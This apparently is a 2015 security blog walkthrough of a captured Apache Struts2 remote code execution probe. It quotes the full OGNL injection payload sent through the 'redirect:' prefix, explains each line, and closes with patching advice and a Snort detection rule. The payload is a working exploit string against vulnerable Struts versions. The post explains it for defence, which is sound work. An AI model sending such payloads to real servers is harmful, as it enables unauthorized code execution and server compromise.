Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack.
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()} But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

In this example we see the vulnerable 'redirect' method being used.

GET /How.do?redirect:

Request to Java Servlet on Apache Tomcat server that is hopefully running an old version that is vulnerable to the redirect method code execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Get this web request's Response so the attacker can tweak the settings on it

#res.setCharacterEncoding("UTF-8"),

Change the response to a character set that is readable like UTF-8

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request so the attacker can change was it does

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Change this request so that instead of redirecting, it prints the absolute path on disk where the apache tomcat server is hosting the web files

Summary: This attack is not actually doing anything except validating if they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where tomcat is running) then the bot will immediately send another more malicious attack that drops a persistent payload on to compromise the server.

Keep your software versions up-to-date.

FYI - This is the snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment: